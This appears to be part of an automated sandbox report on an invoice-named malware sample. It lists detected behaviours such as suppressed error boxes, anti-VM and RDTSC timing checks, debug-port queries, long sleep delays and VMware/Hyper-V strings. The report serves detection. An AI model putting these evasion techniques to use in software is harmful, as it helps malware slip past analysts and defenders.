          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe PID: 4512, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: ABD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: BBD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: BF70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeMemory allocated: CF70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5808Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3885Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2325Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7620Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeAPI coverage: 1.6 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 1.6 %
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe TID: 5484Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1804Thread sleep count: 2325 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1804Thread sleep time: -4650000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1804Thread sleep count: 7620 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1804Thread sleep time: -15240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3300Thread sleep count: 760 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3300Thread sleep time: -1520000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3300Thread sleep count: 9211 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3300Thread sleep time: -18422000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000006.00000000.2150317707.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000006.00000000.2150317707.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000006.00000002.4576280943.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000006.00000000.2138849536.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2138849536.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000006.00000002.4576280943.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000000.2150317707.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000006.00000000.2138849536.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000000.2138849536.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2150317707.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0040ACF0 LdrLoadDll,4_2_0040ACF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A259F2 GetLastError,RegQueryValueExW,RegCloseKey,GlobalFree,RegCreateKeyExW,RegSetValueExW,lstrlenW,RegSetValueExW,RegCloseKey,memset,OutputDebugStringW,SetLastError,7_2_00A259F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A25C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,7_2_00A25C84
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01140115 mov eax, dword ptr fs:[00000030h]4_2_01140115
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112A118 mov ecx, dword ptr fs:[00000030h]4_2_0112A118
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112A118 mov eax, dword ptr fs:[00000030h]4_2_0112A118
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112A118 mov eax, dword ptr fs:[00000030h]4_2_0112A118
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112A118 mov eax, dword ptr fs:[00000030h]4_2_0112A118
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov ecx, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov ecx, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov ecx, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov eax, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0112E10E mov ecx, dword ptr fs:[00000030h]4_2_0112E10E
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010B0124 mov eax, dword ptr fs:[00000030h]4_2_010B0124
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01118158 mov eax, dword ptr fs:[00000030h]4_2_01118158
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107C156 mov eax, dword ptr fs:[00000030h]4_2_0107C156
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01114144 mov eax, dword ptr fs:[00000030h]4_2_01114144
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01114144 mov eax, dword ptr fs:[00000030h]4_2_01114144
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01114144 mov ecx, dword ptr fs:[00000030h]4_2_01114144
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01114144 mov eax, dword ptr fs:[00000030h]4_2_01114144
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01114144 mov eax, dword ptr fs:[00000030h]4_2_01114144
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086154 mov eax, dword ptr fs:[00000030h]4_2_01086154
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01086154 mov eax, dword ptr fs:[00000030h]4_2_01086154
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154164 mov eax, dword ptr fs:[00000030h]4_2_01154164
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01154164 mov eax, dword ptr fs:[00000030h]4_2_01154164
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010C0185 mov eax, dword ptr fs:[00000030h]4_2_010C0185
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110019F mov eax, dword ptr fs:[00000030h]4_2_0110019F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110019F mov eax, dword ptr fs:[00000030h]4_2_0110019F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110019F mov eax, dword ptr fs:[00000030h]4_2_0110019F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0110019F mov eax, dword ptr fs:[00000030h]4_2_0110019F
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A197 mov eax, dword ptr fs:[00000030h]4_2_0107A197
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A197 mov eax, dword ptr fs:[00000030h]4_2_0107A197
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0107A197 mov eax, dword ptr fs:[00000030h]4_2_0107A197
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01124180 mov eax, dword ptr fs:[00000030h]4_2_01124180
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_01124180 mov eax, dword ptr fs:[00000030h]4_2_01124180
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113C188 mov eax, dword ptr fs:[00000030h]4_2_0113C188
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0113C188 mov eax, dword ptr fs:[00000030h]4_2_0113C188
